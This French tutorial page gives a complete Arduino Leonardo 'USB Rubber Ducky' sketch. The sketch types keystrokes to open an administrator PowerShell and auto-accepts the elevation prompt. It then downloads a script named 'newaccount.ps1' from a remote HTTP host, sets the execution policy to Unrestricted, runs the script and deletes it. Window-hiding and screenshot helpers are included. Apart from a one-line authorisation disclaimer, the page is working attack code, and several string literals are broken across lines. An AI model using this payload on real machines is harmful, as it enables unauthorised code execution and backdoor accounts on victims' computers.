Exécution d’un script PowerShell avec une USB Rubber Ducky sur Arduino Leonardo

Le code ci-dessous est utilisable sur un Arduino Leonardo ou sur n’importe quel autre périphérique équipé de la puce « MEGA32U4 ». Le script télécharge un script PowerShell depuis une URL distante, le copie sur le bureau, puis l’exécute avant de quitter le shell.

Utilisé à des fins de pentest, un USB Rubber Ducky ne doit être employé que sur des matériels dont vous êtes propriétaire ou pour lesquels vous disposez d’une autorisation.

#include "KeyboardAzertyFr.h"
/**
 * Begins HID keyboard emulation and then waits one "longer" delay
 * (rdLongerDelay, 5 x 100 ms) before anything is typed — presumably so
 * the host has time to enumerate the new keyboard device.
 */
void start() {
  KeyboardAzertyFr.begin();
  // Settle time before the first keystroke.
  rdLongerDelay();
}
/**
 * Ends HID keyboard emulation; no further keystrokes are sent after this.
 */
void finish() {
  // Counterpart of start(): release the keyboard interface.
  KeyboardAzertyFr.end();
}
/**
 * Standard pause between emulated keystrokes: 100 ms.
 */
void rdDelay() {
  const unsigned long pauseMs = 100;
  delay(pauseMs);
}
/**
 * Longer pause: five consecutive rdDelay() calls (5 x 100 ms = 500 ms).
 */
void rdLongerDelay() {
  int remaining = 5;
  while (remaining-- > 0) {
    rdDelay();
  }
}
/**
 * Types the given text verbatim through the emulated keyboard, then
 * applies the standard inter-keystroke pause (rdDelay).
 * @param text  Text handed unchanged to KeyboardAzertyFr.print.
 */
void rdWriteText(String text) {
  // Type first, pause second — the pause is part of the helper's contract.
  KeyboardAzertyFr.print(text);
  rdDelay();
}
/**
 * Presses and releases one key, pausing rdDelay() after the press and
 * again after the release.
 * @param key  Key code passed to KeyboardAzertyFr.press / release.
 */
void rdTypeKey(uint8_t key)
{
  // One step = a press or a release, always followed by the standard pause.
  auto step = [key](bool down) {
    if (down) {
      KeyboardAzertyFr.press(key);
    } else {
      KeyboardAzertyFr.release(key);
    }
    rdDelay();
  };
  step(true);
  step(false);
}

/***********************
 *      Libraries      *
 ***********************
 * You may remove the  *
 * unused functions    *
 * before uploading    *
 * the code to the     *
 * arduino             *
 ***********************/

/**
 * Runs a program through the Windows "Run" dialog: Gui + r, type the
 * program name, send Return.
 * Example: "notepad" starts Notepad, "calc" starts the calculator.
 * @param program  Command line typed into the Run dialog.
 */
void rdRun(String program) {
  rdGuiCombination('r');
  // rdWriteText = print + the standard pause, same as the inline pair.
  rdWriteText(program);
  rdTypeKey(KEY_RETURN);
}

/**
 * Takes a screenshot. Two candidate PrtScreen key codes (206 and 229) are
 * both sent because, per the original author, some machines use one,
 * some the other, and some both; "h" and "b" are then typed, each
 * followed by the standard pause.
 */
void rdPrintScreen() {
  const uint8_t printScreenCodes[] = {206, 229};
  for (uint8_t code : printScreenCodes) {
    rdTypeKey(code);
  }
  KeyboardAzertyFr.print(F("h"));
  rdDelay();
  KeyboardAzertyFr.print(F("b"));
  rdDelay();
}

/**
 * Opens the JavaScript console of a browser: Ctrl + Shift + i.
 */
void rdOpenJavascriptConsole() {
  // Equivalent to the three-key overload: hold Ctrl, then Shift + i.
  KeyboardAzertyFr.press(KEY_LEFT_CTRL);
  rdDelay();
  rdKeyCombination(KEY_LEFT_SHIFT, 'i');
}

/**
 * Hides a window. Per the original author: Alt + Space then "M" starts
 * moving the window, Down Arrow is held so the window is dragged as low
 * as it can go, and Return repositions the cursor.
 */
void rdHideWindow() {
  rdAltCombination(' ');
  KeyboardAzertyFr.print(F("M"));
  rdDelay();
  KeyboardAzertyFr.press(KEY_DOWN_ARROW);
  // Hold the key for ten "longer" delays (10 x 500 ms). The author notes
  // that the real number of registered strokes is lower, since some of
  // the auto-repeated strokes are ignored.
  int holdRounds = 10;
  while (holdRounds-- > 0) {
    rdLongerDelay();
  }
  KeyboardAzertyFr.release(KEY_DOWN_ARROW);
  // Return ends the move and puts the cursor back where it was.
  rdTypeKey(KEY_RETURN);
}

/**
 * Shows the desktop: same as Win + D.
 */
void rdShowDesktop() {
  // Gui = Windows key; rdGuiCombination handles press/release timing.
  const uint8_t showDesktopKey = 'd';
  rdGuiCombination(showDesktopKey);
}

/**
 * Pastes: same as Ctrl + V.
 */
void rdPaste() {
  // Inlined rdCtrlCombination('v').
  rdKeyCombination(KEY_LEFT_CTRL, 'v');
}

/**
 * Cuts: same as Ctrl + X.
 */
void rdCut() {
  // Inlined rdCtrlCombination('x').
  rdKeyCombination(KEY_LEFT_CTRL, 'x');
}

/**
 * Copies: same as Ctrl + C.
 */
void rdCopy() {
  // Inlined rdCtrlCombination('c').
  rdKeyCombination(KEY_LEFT_CTRL, 'c');
}

/**
 * Same as Gui (Windows key) + the received key.
 * @param c  Key pressed while the left Gui key is held.
 */
void rdGuiCombination(uint8_t c) {
  const uint8_t modifier = KEY_LEFT_GUI;
  rdKeyCombination(modifier, c);
}

/**
 * Same as Alt + the received key.
 * @param c  Key pressed while the left Alt key is held.
 */
void rdAltCombination(uint8_t c) {
  const uint8_t modifier = KEY_LEFT_ALT;
  rdKeyCombination(modifier, c);
}

/**
 * Same as Ctrl + the received key.
 * @param c  Key pressed while the left Ctrl key is held.
 */
void rdCtrlCombination(uint8_t c) {
  const uint8_t modifier = KEY_LEFT_CTRL;
  rdKeyCombination(modifier, c);
}

/**
 * Same as Shift + the received key.
 * @param c  Key pressed while the left Shift key is held.
 */
void rdShiftCombination(uint8_t c) {
  const uint8_t modifier = KEY_LEFT_SHIFT;
  rdKeyCombination(modifier, c);
}

/**
 * Same as (hold key) + (target key): the hold key goes down, then the
 * target key, then everything is released; each step is followed by the
 * standard pause.
 * @param holdKey    Modifier pressed first and held.
 * @param targetKey  Key pressed while the modifier is down.
 */
void rdKeyCombination(uint8_t holdKey, uint8_t targetKey) {
  const uint8_t sequence[] = {holdKey, targetKey};
  for (uint8_t k : sequence) {
    KeyboardAzertyFr.press(k);
    rdDelay();
  }
  KeyboardAzertyFr.releaseAll();
  rdDelay();
}

/**
 * Same as (hold key 1) + (hold key 2) + (target key).
 * @param holdKey1   First modifier; pressed and left down.
 * @param holdKey2   Second modifier, handled by the two-key overload.
 * @param targetKey  Key pressed last; the overload releases all keys.
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t targetKey) {
  // Press the first modifier, pause, then delegate the rest.
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();
  rdKeyCombination(holdKey2, targetKey);
}

/**
 * Same as the three-key overload with one more hold key in front.
 * @param holdKey1   First modifier; pressed and left down.
 * @param holdKey2   Second modifier, passed to the three-key overload.
 * @param holdKey3   Third modifier, passed to the three-key overload.
 * @param targetKey  Key pressed last; the chain releases all keys.
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t holdKey3, uint8_t targetKey) {
  // Press the first modifier, pause, then delegate the rest.
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();
  rdKeyCombination(holdKey2, holdKey3, targetKey);
}

/**
 * Opens the command prompt without admin rights (forwards to the
 * boolean overload with admin = false).
 */
void rdOpenCommandPrompt() {
  const boolean withAdminRights = false;
  rdOpenCommandPrompt(withAdminRights);
}

/**
 * Opens the command prompt. With admin = true it sends Gui + x, types
 * "a", waits a fixed 100 ms (plain delay, not rdDelay) and then calls
 * rdAcceptWindowsSmartScreen() to accept the prompt that grants admin
 * rights; otherwise it just launches "cmd" through the Run dialog.
 * @param admin  true to request the elevated variant.
 */
void rdOpenCommandPrompt(boolean admin) {
  if (!admin) {
    rdRun("cmd");
    return;
  }
  // Elevated path.
  rdGuiCombination('x');
  KeyboardAzertyFr.print(F("a"));
  delay(100);
  rdAcceptWindowsSmartScreen();
}

/**
 * Accepts the Windows "smart screen" prompt to grant admin permissions:
 * waits one longer delay for the prompt to appear, then sends Left Arrow
 * and a space.
 */
void rdAcceptWindowsSmartScreen() {
  // Wait until the prompt is expected to be on screen.
  rdLongerDelay();
  rdTypeKey(KEY_LEFT_ARROW);
  rdDelay();
  // A space confirms the focused button.
  KeyboardAzertyFr.print(F(" "));
  rdDelay();
}

/**
 * Changes the keyboard layout (Alt + Shift). If the computer has only
 * one layout this key combination does nothing.
 */
void rdChangeKeyboardLayout() {
  // Inlined rdAltCombination(KEY_LEFT_SHIFT).
  rdKeyCombination(KEY_LEFT_ALT, KEY_LEFT_SHIFT);
}

/**
 * Runs one or more PowerShell scripts through the Run dialog (rdRun).
 * Several scripts are separated by a newline character: every
 * newline-terminated piece is appended as "(piece) ; " after the
 * "powershell " prefix, the last piece is appended as-is, and the
 * assembled command line is typed.
 * NOTE(review): in this listing each '\n' literal is broken across a
 * line break (extraction artifact); read it as a single '\n' character.
 * The `delimiter` local is assigned but never used.
 * @param scripts  Script text; modified locally as pieces are consumed.
 */
void rdPowershellRun(String scripts) {
  char delimiter = '
\n';
  String finalScript = "powershell ";
  // indexOf() > 0: a delimiter at index 0 (empty first piece) ends the loop.
  while (scripts.indexOf('
\n') > 0) {
    finalScript = finalScript + "(" + scripts.substring(0, scripts.indexOf('
\n')) + ") ; ";
    scripts = scripts.substring(scripts.indexOf('
\n') + 1);
  }
  //finalScript = finalScript + "(" + scripts + ")";
  // The last (or only) piece is appended without parentheses.
  finalScript = finalScript + scripts;
  rdRun(finalScript);
}

/**
 * Older press/release helper: holds the key for a fixed 500 ms and does
 * not apply rdDelay(). Differs from rdTypeKey in hold time and in taking
 * an int rather than a uint8_t.
 * @param key  Key code passed to KeyboardAzertyFr.press / release.
 */
void typeKey(int key)
{
  const unsigned long holdMs = 500;
  KeyboardAzertyFr.press(key);
  delay(holdMs);
  KeyboardAzertyFr.release(key);
}

/*********************
 *      Arduino      *
 *********************/
// ---------------------------------------------------
//  ' ' est le symbole qui désigne un espace, il a la valeur 44
//  Alt Gr azerty                   €                                                                    ~  #  {  [  |  `  \  ^  @    ' '  ]  }  ¤
//   Shift azerty       Q  B  C  D  E  F  G  H  I  J  K  L  ?  N  O  P  A  R  S  T  U  V  Z  X  Y  Z  1  2  3  4  5  6  7  8  9  0    ' '  °  +  ¨  £  µ  No fr  M  %  NONE  .  /  §    >
//         azerty       q  b  c  d  e  f  g  h  i  j  k  l  ,  n  o  p  a  r  s  t  u  v  z  x  y  z  &  é  "  '  (  -  è  _  ç  à    ' '  )  =  ^  $  *  No fr  m  ù   ²    ;  :  !    <
//         qwerty       a  b  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v  w  x  y  z  1  2  3  4  5  6  7  8  9  0    ' '  -  =  [  ]  \  No US  ;  '   `    ,  .  /   No US      
//       scancode       4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,  44, 45,46,47,48,49,  50,  51,52, 53,  54,55,56,  100};

/**
 * Sketch entry point (runs once). Opens an elevated shell on the host via
 * keystrokes, types a PowerShell one-liner that downloads a remote script
 * to the user's Desktop, runs it and deletes it, then ends keyboard
 * emulation.
 * Security note (review): everything here is typed in clear into the host
 * and leaves the usual traces — a Gui+x launch, a PowerShell command line
 * containing the URL, a file written under the user's Desktop, and an
 * execution-policy change; host command-line and script-block logging
 * capture the whole one-liner.
 */
void setup() {

   
  start();
  // Open PowerShell as administrator (rdOpenCommandPrompt(true) also
  // sends the keystrokes that accept the elevation prompt).
  rdOpenCommandPrompt(true);
  delay(500);
  // Start typing the download of a remote script: $output = $env:USERPROFILE
  KeyboardAzertyFr.print("$output = $env:USERPROFILE");

  // Types a '+' for PowerShell string concatenation: on this AZERTY layout
  // it is Shift + the '=' key.
  KeyboardAzertyFr.press(KEY_LEFT_SHIFT);
  KeyboardAzertyFr.print("=");// '+' for concatenation
  KeyboardAzertyFr.release(KEY_LEFT_SHIFT);

  // NOTE(review): the string literal below is broken across a line break
  // in this listing (extraction artifact); presumably it is the opening
  // quote of the path string.
  KeyboardAzertyFr.print("'
");
 
  // To compose the '\' character of the PowerShell path:
  // Alt Gr = Ctrl + Alt, then raw scan code 37 (see the layout table above).
  KeyboardAzertyFr.press(KEY_LEFT_CTRL);
  KeyboardAzertyFr.press(KEY_LEFT_ALT);
  keyboardScanCode(37); // or keyboard.print('\');
  KeyboardAzertyFr.release(KEY_LEFT_ALT);
  KeyboardAzertyFr.release(KEY_LEFT_CTRL);
 
   KeyboardAzertyFr.print("
Desktop");
   
  // Second '\' of the path, same Alt Gr + scan code 37 sequence.
  KeyboardAzertyFr.press(KEY_LEFT_CTRL);
  KeyboardAzertyFr.press(KEY_LEFT_ALT);
  keyboardScanCode(37); // or keyboard.print('\');
  KeyboardAzertyFr.release(KEY_LEFT_ALT);
  KeyboardAzertyFr.release(KEY_LEFT_CTRL);
  KeyboardAzertyFr.print("
myscript.ps1';");
  // The one-liner: fetch the script over plain HTTP into $output (no TLS
  // and no integrity check on what is fetched), set the execution policy
  // to Unrestricted in the default scope (persists after this run, not
  // process-only), execute the file, delete it, exit.
  KeyboardAzertyFr.print("Invoke-WebRequest -Uri http://192.168.22.37/newaccount.ps1 -OutFile $output;Set-ExecutionPolicy Unrestricted -force; & $output;Remove-Item -path $output;exit;");

   delay(500);
   // Return submits the typed command line.
   rdTypeKey(KEY_RETURN);

 
  finish();


 
}

/**
 * Arduino main loop: intentionally empty, all work happens once in setup().
 */
void loop() {
  // Nothing to do after setup() has run.
}



/**
 * Presses and releases a raw scan code, held for 5 ms. 136 is added to
 * the code before press()/release() — presumably the same convention as
 * the stock Arduino Keyboard library, where values of 136 and above are
 * treated as raw HID codes rather than ASCII (confirm against
 * KeyboardAzertyFr.h).
 * @param code  Raw scan code, e.g. 37 for '\' on the layout table above.
 */
void keyboardScanCode(byte code){
  const uint8_t raw = code + 136;
  KeyboardAzertyFr.press(raw);
  delay(5);
  KeyboardAzertyFr.release(raw);
}
